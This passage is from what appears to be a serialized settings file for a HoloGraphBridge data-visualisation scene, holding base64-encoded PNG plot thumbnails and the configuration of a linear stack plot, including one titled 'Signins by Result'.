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', 'Title': 'Signins by Result', 'TitleSize': 1, 'TransitionIndex': 0}, {'$type': 'HoloGraphBridge.Plots.LinearStackPlot, HoloGraphBridge', 'AxesDivisions': [100, 1, 22], 'AxesDivisionsAuto': [False, False, False], 'AxesEdgesShow': [True, True, True], 'AxesGridlinesShow': [True, True, True], 'AxesLabelsOrientation': [1, 1, 1], 'AxesLabelsShow': [True, False, True], 'AxesLabelsSize': [0.09, 0.25, 0.42], 'AxesTicksShow': [False, False, False], 'AxesTitleSize': [0.5, 0.5, 0.5], 'PositionFill': [False, False, False], 'PositionIndex': [37, -1, -1], 'PositionRescale': [False, False, False], 'PositionReverse': [False, False, False], 'PositionScale': [1, 7.3, 1], 'StackBuckets': [365, 0, 1], 'StackBucketsAuto': [True, True, True], 'StackBucketsFill': [False, False, False], 'StackGroup': False, 'StackOrderAuto': True, 'StackOrderIndex': 42, 'StackOrderReverse': False, 'StackRescale': False, 'StackSpacing': [0, 1, 0], 'StackSpacingAuto': [False, False, False], 'StackSumIndex': -1, 'StackWidth': [1, 1, 43], 'StackWidthAuto': [False, False, False], 'CameraRotation': [0, 0, 0, 1], 'CameraTranslation': [0, 0, 0], 'ColorFill': False, 'ColorIndex': 42, 'Filter': -1, 'LabelColumns': [{'Index': 26, 'Name': False, 'Units': False}, {'Index': 35, 'Name': False, 'Units': False}], 'Layers': [], 'ManipulationRotation': [True, True, True], 'ManipulationScale': True, 'ManipulationTranslation': [True, True, True], 'ModelRotation': [-0.21141070127487183, -0.2973678708076477, -0.09500154852867126, 0.926202118396759], 'ModelScale': 4, 'ModelTranslation': [-0.9244940280914307, 1.0606968402862549, -1.6016837358474731], 'OrderIndex': 0, 'PaletteColors': [242, 27, 63, 255, 41, 191, 18, 255], 'PaletteDivisions': 2, 'PaletteDivisionsAuto': True, 'PaletteReverse': False, 'Selection': -1, 'Table': 0, 'TextSize': 0.5, 'TextWidth': 5, 'Thumbnail': 'data:image/png;base64,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